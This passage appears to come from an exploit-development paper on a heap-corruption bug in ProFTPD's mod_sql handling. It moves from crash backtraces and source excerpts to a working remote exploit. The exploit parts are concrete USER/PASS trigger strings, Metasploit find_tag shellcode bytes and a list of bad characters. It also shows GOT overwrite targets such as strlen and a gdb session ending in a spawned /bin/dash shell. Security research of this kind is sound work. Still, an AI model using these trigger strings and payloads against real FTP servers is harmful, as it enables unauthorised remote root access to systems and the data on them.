+EIP: 0x08054b0c, EBP: 0xbfd0a348, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
+EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
+EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.99758.0
+EAX: 0x62413362
+EBX: 0x0882d4ac
+ECX: 0x00000002
+EDX: 0x088356c8
+ESI: 0x080d4960
+EDI: 0x088161e8
+EBP: 0xbfd0a338
+ESP: 0xbfd0a330
+EIP: 0x08054b7d
+
+Unfortunately, EIP is the same as the 2813d637d735be610a460a75db061f6b
+backtrace, except it dies with pr_auth_getgroups in the backtrace, rather 
+than pr_auth_getpwnam.
+
+------[ 3.3.4 - 844319188798d7742af43d10f6541a61 backtrace ]
+
+# cat bt_frames.103331.0
+EIP: 0x08054b7d, EBP: 0xbfd0a368, destroy_pool
+EIP: 0x08054b0c, EBP: 0xbfd0a378, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a388, destroy_pool
+EIP: 0x08074a37, EBP: 0xbfd0a438, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a468, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a4a8, pr_auth_get_anon_config
+EIP: 0x080c5691, EBP: 0xbfd0a4d8, sql_pre_pass
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804c9bb, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.103331.0
+EAX: 0x62413362
+EBX: 0x0000a2f3
+ECX: 0x00000002
+EDX: 0x0882f2b8
+ESI: 0x080d4960
+EDI: 0x088161e8
+EBP: 0xbfd0a368
+ESP: 0xbfd0a360
+EIP: 0x08054b7d
+
+Not that interesting, unfortunately. 
+
+------[ 3.3.5 - 914b175392625fe75c2b16dc18bfb250 backtrace ]
+
+# cat bt_frames.98014.0
+EIP: 0x080544e0, EBP: 0xbfd0a368, free_blocks
+EIP: 0x08054b30, EBP: 0xbfd0a378, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a388, destroy_pool
+EIP: 0x08074a37, EBP: 0xbfd0a438, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a468, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a4a8, pr_auth_get_anon_config
+EIP: 0x080c5691, EBP: 0xbfd0a4d8, sql_pre_pass
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804c9bb, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.98014.0
+EAX: 0x33614132
+EBX: 0x00009bd9
+ECX: 0x00000002
+EDX: 0x0882ea84
+ESI: 0x080d4960
+EDI: 0x088161e8
+EBP: 0xbfd0a368
+ESP: 0xbfd0a350
+EIP: 0x080544e0
+
+EAX contains a corrupted value.
+
+Looking at it further:
+
+This GDB was configured as "i486-linux-gnu"...
+(gdb) l *0x080544e0
+0x80544e0 is in free_blocks (pool.c:138).
+133
+134       block_freelist = blok;
+135
+136       /* Adjust first_avail pointers */
+137
+138       while (blok->h.next) {
+139         chk_on_blk_list(blok, old_free_list);
+140         blok->h.first_avail = (char *) (blok + 1);
+141         blok = blok->h.next;
+142       }
+
+This is semi-interesting, as we can overwrite something to point to the end
+of the block (the start of the allocated usable memory). However, the 
+blok = blok->h.next loop makes things a lot more trickier than we'd like 
+(finding a suitable pointer that terminates the loop without crashing, 
+etc.)
+
+Moving on...
+
+------[ 3.3.6 - b975726b4537662f3f5ddf377ea26c20 backtrace ]
+
+# cat bt_frames.1575.0
+EIP: 0x080544e0, EBP: 0xbfd0a338, free_blocks
+EIP: 0x08054b30, EBP: 0xbfd0a348, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
+EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
+EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.1575.0
+EAX: 0x33614132
+EBX: 0x0882d29c
+ECX: 0x00000002
+EDX: 0x088398a4
+ESI: 0x080d4960
+EDI: 0x088161e8
+EBP: 0xbfd0a338
+ESP: 0xbfd0a320
+EIP: 0x080544e0
+
+This is a duplicate of the previous one..
+
+------[ 3.3.7 - ccbbd918ad0dbc7a869184dc2eb9cc50 backtrace ]
+
+# cat bt_frames.1081.0 
+EIP: 0x080544e0, EBP: 0xbfd0a318, free_blocks
+EIP: 0x08054b30, EBP: 0xbfd0a328, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a338, destroy_pool
+EIP: 0x08054b0c, EBP: 0xbfd0a348, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
+EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
+EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.1081.0
+EAX: 0x33614132
+EBX: 0x0882d29c
+ECX: 0x00000002
+EDX: 0x08839484
+ESI: 0x080d4960
+EDI: 0x088161e8
+EBP: 0xbfd0a318
+ESP: 0xbfd0a300
+EIP: 0x080544e0
+
+Another duplicate :(
+
+------[ 3.3.8 - f1bfd5428c97b9d68a4beb6fb8286b70 backtrace ] 
+
+# cat bt_frames.11512.0
+EIP: 0xb7b7e67a, EBP: 0xbfd0a118, memset
+EIP: 0x080c2520, EBP: 0xbfd0a148, _sql_make_cmd
+EIP: 0x080c4344, EBP: 0xbfd0a1f8, _sql_getpasswd
+EIP: 0x080c514d, EBP: 0xbfd0a2d8, _sql_getgroups
+EIP: 0x080ca70e, EBP: 0xbfd0a308, cmd_getgroups
+EIP: 0x080718a6, EBP: 0xbfd0a328, call_module
+EIP: 0x0807339e, EBP: 0xbfd0a358, dispatch_auth
+EIP: 0x0807481d, EBP: 0xbfd0a408, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
+EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.11512.0
+EAX: 0x00000000
+EBX: 0x0882da74
+ECX: 0x00000024
+EDX: 0x00000001
+ESI: 0x080d4960
+EDI: 0x41346141
+EBP: 0xbfd0a118
+ESP: 0xbfd0a0e8
+EIP: 0xb7b7e67a
+
+EDI is a pointer we control. Looking at it further:
+
+(gdb) l *0x080c2520
+0x80c2520 is in _sql_make_cmd (mod_sql.c:350).
+345       register unsigned int i = 0;
+346       pool *newpool = NULL;
+347       cmd_rec *cmd = NULL;
+348       va_list args;
+349
+350       newpool = make_sub_pool(p);
+351       cmd = pcalloc(newpool, sizeof(cmd_rec));
+352       cmd->argc = argc;
+353       cmd->stash_index = -1;
+354       cmd->pool = newpool;
+(gdb)
+355
+356       cmd->argv = pcalloc(newpool, sizeof(void *) * (argc + 1));
+357       cmd->tmp_pool = newpool;
+358       cmd->server = main_server;
+359
+360       va_start(args, argc);
+361
+362       for (i = 0; i < argc; i++)
+363         cmd->argv[i] = (void *) va_arg(args, char *);
+364
+(gdb)
+365       va_end(args);
+366
+367       cmd->argv[argc] = NULL;
+368
+369       return cmd;
+370     }
+371
+372     static int check_response(modret_t *mr) {
+373       if (!MODRET_ISERROR(mr))
+374         return 0;
+
+Interesting, it's in the make_sub_pool() code. Looking at it further:
+
+---
+310 struct pool *make_sub_pool(struct pool *p) {
+311   union block_hdr *blok;
+312   pool *new_pool;
+313
+314   pr_alarms_block();
+315
+316   blok = new_block(0, FALSE);
+317
+318   new_pool = (pool *) blok->h.first_avail;
+319   blok->h.first_avail += POOL_HDR_BYTES;
+320
+321   memset(new_pool, 0, sizeof(struct pool));
+322   new_pool->free_first_avail = blok->h.first_avail;
+323   new_pool->first = new_pool->last = blok;
+324
+325   if (p) {
+326     new_pool->parent = p;
+327     new_pool->sub_next = p->sub_pools;
+328
+329     if (new_pool->sub_next)
+330       new_pool->sub_next->sub_prev = new_pool;
+331
+332     p->sub_pools = new_pool;
+333   }
+334
+335   pr_alarms_unblock();
+336
+337   return new_pool;
+338 }
+---
+
+So, if we got it returning an arbitrary pointer, allocations from this
+pool (if within the default pool size) will overwrite memory we
+control.. let's see what could be (include/dirtree.h):
+
+---
+ 96 typedef struct cmd_struc {
+ 97   pool *pool;
+ 98   server_rec *server;
+ 99   config_rec *config;
+100   pool *tmp_pool;               /* Temporary pool which only exists
+101                                  * while the cmd's handler is running
+102                                  */
+103   int argc;
+104
+105   char *arg;                    /* entire argument (excluding 
+                                       command) */
+106   char **argv;
+107   char *group;                  /* Command grouping */
+108
+109   int  class;                   /* The command class */
+110   int  stash_index;             /* hack to speed up symbol hashing in 
+                                       modules.c */
+111   pr_table_t *notes;            /* Private data for passing/retaining 
+                                       between handlers */
+112 } cmd_rec;
+---
+
+Hmm, so we could overwrite pointers with somewhat controllable contents
+(don't forget the SELECT .. FROM .. WHERE type stuff interfering..)
+
+------[ 3.3.9 - Summary ]
+
+Out of the backtraces it has generated, the following look most useful (in 
+usefulness looking order :p):
+
+- 11380f2c8ce44d29b93b9bc6308692ae
+- f1bfd5428c97b9d68a4beb6fb8286b70
+- 914b175392625fe75c2b16dc18bfb250
+
+Considering the code path taken, the first is the most easily exploitable. 
+Unfortunately, we haven't got a clean EIP overwrite, and instead require 
+returning a suitable pointer that will trash stuff near by it... depending 
+on exploitation avenue, this may make things rather complicated. 
+
+--[ 3.4 - Exploitation avenues ]
+
+So far, we've found an approach that allows us to return a pointer to be
+used later on where data we control is used in conjunction with other data. 
+
+What can we do with that? There's a couple of possibilities:
+
+- Work out how to indicate authentication has succeeded
+  - Should leave us with the ftpd with nobody (revertable to root) 
+    privileges, and access to /. That'd be pretty neat ;D
+  - If we munge the heap too much, however, it may crash. Depending on 
+    what's being overwritten etc, it may be unavoidable.
+
+- Run our own shellcode 
+  - We can revert to root with a setresuid() call.
+  - More anti-forensically acceptable / less effort / etc :p
+
+------[ 3.4.1 - Shellcode approach ] 
+
+By returning a pointer that leads us to overwrite a function pointer with 
+our contents, we can run shellcode. All that's required is a single 
+address. Let's say for arguments say, we use 
+
+USER ...SHELLCODE%m%a..<POINTER TO RETURN><OVERWRITE CONTENT>
+
+We would overwrite the function pointer with a pointer to shellcode (our
+original pointer - X bytes to hit it). If we need to brute force a target 
+pointer to overwrite, we can probably repeat <OVERWRITE CONTENT> several 
+times to cover more memory than normal.
+
+Due to space considerations, it would be best to use a find sock / recv() 
+tag shellcode as a stager, then sending a another payload later on.
+
+If shellcode size is a problem, it would be possible to spray our shellcode
+across the heap in the fake auth attempt, and use an egg hunter code in the
+trigger auth attempt. Ideally we would have a register or stack contents to
+give us an idea of where to start in case of ASLR. 
+
+There are perhaps some other techniques that may be possible on certain
+configurations, such as inputting the shellcode via reverse DNS, or in the 
+ident lookup text. While possible, it's not entirely needed at this point 
+in time and wasn't explored further.
+
+Talking about shellcode, we should look at what character restrictions 
+have. Obviously, \x0d, \x0a, \x00 would be problematic since FTP is a text 
+line based protocol. Reading further over the contrib/mod_sql_mysql.c code,
+we see that we have several other restrictions, as documented in [8], which
+gives us the following bad characters:
+
+\x0d (\r), \x0a (\n), \x00, \x27 ('), \x22 ("), \x08 (\b), \x09 (\t)
+\x1b (\Z), \x5c (\\), \x5f (_), \x25 (%)
+
+(That is, assuming we are exploiting ProFTPD getting auth information from 
+MySQL. If it's getting information from Postgresql, then the bad character 
+restrictions are probably different).
+
+All in all, those restrictions aren't too bad, and some light 
+experimentation implies it should be fine to use, as the following pastes 
+show:
+
+---
+msf payload(shell_find_tag) >  generate -b
+"\x00\x27\x22\x08\x0a\x0d\x09\x1B\x5c\x5f" -t c -o PrependSetresuid=true
+/*
+ * linux/x86/shell_find_tag - 102 bytes
+ * http://www.metasploit.com
+ * Encoder: x86/fnstenv_mov
+ * AppendExit=false, PrependSetresuid=true, TAG=2pDv,
+ * PrependSetuid=false, PrependSetreuid=false
+ */
+unsigned char buf[] =
+"\x6a\x14\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12\x87"
+"\xe9\xb7\x83\xeb\xfc\xe2\xf4\x23\x4e\xd8\x6c\xe5\x64\x59\x13"
+"\xdf\x07\xd8\x6c\x41\x0e\x0f\xdd\x52\x30\xe3\xe4\x44\xd4\x60"
+"\x56\x94\x7c\x8f\x48\x13\xed\x8f\xef\xdf\x07\x68\x89\x20\xf7"
+"\xad\xc1\x67\x77\xb6\x3e\xe9\xed\xeb\xee\x78\xb8\xb1\x7a\x92"
+"\xce\x90\x4f\x78\x8c\xb1\x2e\x40\xef\xc6\x98\x61\xef\x81\x98"
+"\x70\xee\x87\x3e\xf1\xd5\xba\x3e\xf3\x4a\x69\xb7";
+
+...
+
+msf payload(find_tag) > use payload/linux/x86/shell/find_tag
+msf payload(find_tag) > generate -b
+"\x00\x27\x22\x08\x0a\x0d\x09\x1B\x5c\x5f" -t c -o PrependSetresuid=true
+/*
+ * linux/x86/shell/find_tag - 74 bytes (stage 1)
+ * http://www.metasploit.com
+ * Encoder: x86/shikata_ga_nai
+ * AppendExit=false, PrependSetresuid=true, TAG=qvkV,
+ * PrependSetuid=false, PrependSetreuid=false
+ */
+unsigned char buf[] =
+"\x31\xc9\xbf\xd3\xde\x9e\x99\xdb\xc9\xd9\x74\x24\xf4\x5b\xb1"
+"\x0c\x83\xc3\x04\x31\x7b\x0f\x03\x7b\x0f\xe2\x26\xef\x57\xa8"
+"\x13\xe7\x8b\x7b\x07\xc5\xcc\x4d\x9c\x85\x45\x4b\x48\x6a\xe1"
+"\x9e\xdf\x3c\x5e\x16\x3e\x46\x9b\x4e\x3f\x46\x36\xe9\xe7\x84"
+"\x46\x74\x29\x66\x31\x1c\x03\xfd\x4d\xbd\x57\x50\x52\xa4";
+
+/*
+ * linux/x86/shell/find_tag - 36 bytes (stage 2)
+ * http://www.metasploit.com
+ */
+unsigned char buf[] =
+"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"
+"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
+"\x52\x53\x89\xe1\xcd\x80";
+---
+
+We can note down that we require 74 bytes or so for the shellcode.
+
+If character encoding is enabled in ProFTPD (via mod_lang), this may incur 
+further restrictions in characters we can use, or alternatively require 
+decoding our payload, so that when it's encoded, it is correct. If 
+possible/suitable, that is :p
+
+If the pointers we are after contain a bad character, we're in a little bit
+of trouble :|
+
+------[ 3.4.2 - Data manipulation ]
+
+There are plenty of global variables that can be modified in ProFTPD, that 
+can/may be useful for data manipulation. 
+
+grep'ing the src/ directory for "authenticated" shows some interesting 
+code:
+
+---
+ 288 static void shutdown_exit(void *d1, void *d2, void *d3, void *d4) {
+ 289   if (check_shutmsg(&shut, &deny, &disc, shutmsg, sizeof(shutmsg)) == 
+          1) {
+ 290     char *user;
+ 291     time_t now;
+ 292     char *msg;
+ 293     const char *serveraddress;
+ 294     config_rec *c = NULL;
+ 295     unsigned char *authenticated = get_param_ptr(main_server->conf,
+ 296       "authenticated", FALSE);
+ 297
+...
+ 388       if (c->requires_auth && cmd_auth_chk && !cmd_auth_chk(cmd))
+ 389         return -1;
+ 390
+... (cmd_auth_chk being a .bss function pointer)
+ 393       cmdargstr = make_arg_str(cmd->tmp_pool, cmd->argc, cmd->argv);
+ 394
+ 395       if (cmd_type == CMD) {
+ 396
+ 397         /* The client has successfully authenticated... */
+ 398         if (session.user) {
+ 399           char *args = strchr(cmdargstr, ' ');
+ 400
+ 401           pr_scoreboard_entry_update(session.pid,
+ 402             PR_SCORE_CMD, "%s", cmd->argv[0], NULL, NULL);
+ 403           pr_scoreboard_entry_update(session.pid,
+ 404             PR_SCORE_CMD_ARG, "%s", args ?
+ 405               pr_fs_decode_path(cmd->tmp_pool, (args+1)) : "", NULL, 
+                                     NULL);
+ 406
+ 407           pr_proctitle_set("%s - %s: %s", session.user, 
+               session.proc_prefix,
+ 408             cmdargstr);
+ 409
+ 410         /* ...else the client has not yet authenticated */
+ 411         } else {
+ 412           pr_proctitle_set("%s:%d: %s", session.c->remote_addr ?
+ 413             pr_netaddr_get_ipstr(session.c->remote_addr) : "?",
+ 414             session.c->remote_port ? session.c->remote_port : 0, 
+                 cmdargstr);
+ 415         }
+ 416       }
+---
+
+in modules/mod_auth.c:
+
+---
+  59 /* auth_cmd_chk_cb() is hooked into the main server's auth_hook 
+        function,
+  60  * so that we can deny all commands until authentication is complete.
+  61  */
+  62 static int auth_cmd_chk_cb(cmd_rec *cmd) {
+  63   unsigned char *authenticated = get_param_ptr(cmd->server->conf,
+  64     "authenticated", FALSE);
+  65
+  66   if (!authenticated || *authenticated == FALSE) {
+  67     pr_response_send(R_530, _("Please login with USER and PASS"));
+  68     return FALSE;
+  69   }
+  70
+  71   return TRUE;
+  72 }
+  73
+---
+
+The authenticated configuration directive is set:
+
+---
+1846     c = add_config_param_set(&cmd->server->conf, "authenticated", 1, 
+                                  NULL);
+1847     c->argv[0] = pcalloc(c->pool, sizeof(unsigned char));
+1848     *((unsigned char *) c->argv[0]) = TRUE;
+---
+
+It seems a little complicated to call due to other code around it..  but
+it'd probably be possible to with a bit of effort and the stack wasn't
+randomized, or maybe some other approaches.  That said, the author isn't
+going to spend much time looking at it. One last thought on the matter:
+
+---
+ 192   /* By default, enable auth checking */
+ 193   set_auth_check(auth_cmd_chk_cb);
+---
+
+If authentication is bypassed, but setresuid() is not callable (via NX, or 
+whatever), then there is a slight restriction of the user id it has by 
+default:
+
+# cat /proc/19840/status
+Name:   proftpd
+State:  T (tracing stop)
+Tgid:   19840
+Pid:    19840
+PPid:   19830
+TracerPid:      19846
+Uid:    0       65534   0       65534
+Gid:    65534   65534   65534   65534
+FDSize: 32
+Groups: 65534
+...
+CapInh: 0000000000000000
+CapPrm: ffffffffffffffff
+CapEff: 0000000000000000
+CapBnd: ffffffffffffffff
+
+UID/GID list in real, effective, saved, fsuid format. Without reverting
+privileges, it limits what we can do. That said, it allows for a lot of
+information leaking if the directory permissions aren't too strict / acl's 
+aren't too strict.
+
+--[ 4 - Writing an exploit ] 
+
+Before writing an exploit, we should quickly review what we have found out 
+before:
+
+- Variable substitution allows us expand past the allocated 4096 bytes
+  - %m/%r duplicates our input
+  - %a gives us our IP address
+  - %f gives us -
+  - %T gives us 0.0
+  - %Z gives us {UNKNOWN TAG}
+  - %l gives us UNKNOWN if ident checking is disabled (default).. we'll use
+    it even though it's not ideal (ident could be enabled, and if the box 
+    where the exploit is ran from is running ident, it could affect the 
+    ProFTPD heap layout more.
+
+%a isn't all that good for a remote exploit, as the byte count can differ 
+(attacking from 1.2.3.4 vs 136.246.139.246. We'll try excluding that for 
+now, although it's useful for consuming small chunks :|
+
+In order to exploit this vulnerability, we can re-use some of our existing 
+code to find the input strings needed against new targets when we can 
+replicate a target environment.
+
+------[ 4.1 - Exploitation via arbitrary pointer return ] 
+
+So, let's see, what do we need to do?
+
+- Find a suitable trigger string that allows us, say:
+  - 16 byte overwrite (since our offset is 12 for first_avail pointer)
+  - 74 bytes of shellcode. Should be plenty of space, and enough to do 
+    interesting things with.
+
+- Find a suitable target. For the most part, the GOT seems a good
+  target, though this may be reassessed later on.
+  - Ideally you'd want to use a libc function that will be used next.
+    Due to the style of attack we're using, if it uses another libc 
+    function, we may overwrite it with crap (crap being stuff like table
+    entries / names / our expanded string) :(
+
+After some experimentation, I came up with the following input strings to 
+trigger the vulnerability with a suitable call tree:
+
+- USER %T%m%Z%m%T%l%m%f%l%m%lA%T%m%f%f%l%m%m%T%m%f%m%m%m%mA%m%f%f%l%m%TA%m%
+m%f%l%TA%fA%l%Z%fA%T%T%l%f%l%f%f%Z%l%m%Z%f%l%T%f%Z%fAAA%Z%l%m%fA%l%m%TA%ZA%
+f%lAA%f%m%Z%Z%Z%T%Z%f%m%Z%l%fA%Z
+- PASS invalid
+- USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAA%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%
+m%T%m%m%Z%T%m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1Aa2Aa3Aa4A
+
+And we have a crash writing to 0x41346141 ;)
+
+With that info in hand, we can start writing the exploit.. let's find a 
+target to overwrite.. From glancing over the back traces, it looks like 
+mysql_real_query() is a suitable target.
+
+080e81a8 R_386_JUMP_SLOT   mysql_real_query
+
+Plugging that in, and we get:
+
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xb7c7a6b0 (LWP 12830)]
+0x41414141 in ?? ()
+(gdb) bt
+#0  0x41414141 in ?? ()
+#1  0x080c0ea1 in cmd_select (cmd=0x98ae7ec) at mod_sql_mysql.c:838
+
+Well, that's good. Not entirely what I was expecting though. Looking at the
+backtrace, we see it's calling time(NULL), so let's see:
+
+080e8218 R_386_JUMP_SLOT   time
+
+4187    int sql_log(int level, const char *fmt, ...) {
+4188      char buf[PR_TUNABLE_BUFFER_SIZE] = {'\0'};
+4189      time_t timestamp = time(NULL);
+4190      struct tm *t = NULL;
+4191      va_list msg;
+
+So, it looks like time is a better target. Updating our exploit:
+
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xb7c7a6b0 (LWP 12923)]
+0x72657375 in ?? ()
+(gdb)
+
+That looks better (>>> "72657375".decode('hex') -> 'resu')
+
+(gdb) x/s 0x080e8218
+0x80e8218 <_GLOBAL_OFFSET_TABLE_+548>:   "userid, passwd, uid, gid,
+homedir, shell FROM ftpuser WHERE (userid='", 'A' <repeats 74 times>,
+"0.0-0.0A{UNKNOWN TAG}", 'A' <repeats 36 times>...
+
+Looking further
+
+(gdb) call strlen(0x080e8218)
+$1 = 4155
+(gdb) x/s 0x080e8218+4155-128
+0x80e91d3 <scoreboard_file+2963>:
+"%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m%m%Z%T%
+m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1Aa2Aa3\030\202\016"
+(gdb) x/40x 0x080e8218+4155-64
+0x80e9213 <[...]_file+3027>: 0x256d2554 0x255a256d 0x256d2554 0x416c255a
+0x80e9223 <[...]_file+3043>: 0x6c255425 0x54256c25 0x5a256625 0x66256d25
+0x80e9233 <[...]_file+3059>: 0x54256625 0x5a256625 0x6d256c25 0x25415425
+0x80e9243 <[...]_file+3075>: 0x3061416d 0x41316141 0x61413261 0x0e821833
+
+Playing around further, we see that strlen() is called before that, so 
+further experimentation reveals we want to overwrite:
+
+080e819c R_386_JUMP_SLOT   strlen
+
+(Code for this can be found in [9])
+
+And our offset is 0x080e819c-358..
+
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xb7c7a6b0 (LWP 13357)]
+0x41306141 in ?? ()
+
+So, we've made it jump to another pattern in msf.. which we can replace 
+with a pointer to our shellcode.. which will be:
+
+(gdb) x/s 0x080e819c
+0x80e819c <_GLOBAL_OFFSET_TABLE_+424>:
+"Aa0Aa1Aa2Aa36\200\016\b{UNKNOWN TAG}", 'A' <repeats 74 times>,
+"%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m
+%m%Z%T%m%Z%lA%T%l%l%T%f"...
+(gdb) x/s 0x080e819c+29
+0x80e81b9 <_GLOBAL_OFFSET_TABLE_+453>:   'A' <repeats 74 times>,
+"%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m
+%m%Z%T%m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1"...
+
+To hit our A's.
+
+We can now use a suitable stager findsock/execve shell... We'll use the one
+we found earlier with metasploit. Verifying that we can hit our shellcode, 
+we see:
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+[Switching to Thread 0xb7c7a6b0 (LWP 13476)]
+0x080e81ba in _GLOBAL_OFFSET_TABLE_ ()
+
+So, now we get to validate the shellcode works as expected (code can be 
+found in [10])
+
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xb7b666b0 (LWP 13648)]
+0xbf86cad0 in ?? ()
+(gdb) x/10i $eip
+0xbf86cad0:     mov    %edi,%ebx
+0xbf86cad2:     push   $0x2
+0xbf86cad4:     pop    %ecx
+0xbf86cad5:     push   $0x3f
+0xbf86cad7:     pop    %eax
+0xbf86cad8:     int    $0x80
+0xbf86cada:     dec    %ecx
+0xbf86cadb:     jns    0xbf86cad5
+0xbf86cadd:     push   $0xb
+0xbf86cadf:     pop    %eax
+
+Whoops. Not so much. The stager code works by reading from the socket to 
+the stack, and jumping to the stack once complete. It seems that the kernel
+I'm using doesn't make the stack executable even if you setarch/personality
+it. 
+
+We could work around that short coming in metasploit by changing our 
+shellcode to read() into a different buffer, or mmap() some suitable 
+memory, or one of a hundred things. For now though, I'll cheat and install 
+the generic kernel, and try to finish off this paper :)
+
+Installing the ubuntu -generic kernel, we see (in gdb):
+
+---
+[New process 4936]
+Executing new program: /bin/dash
+(no debugging symbols found)
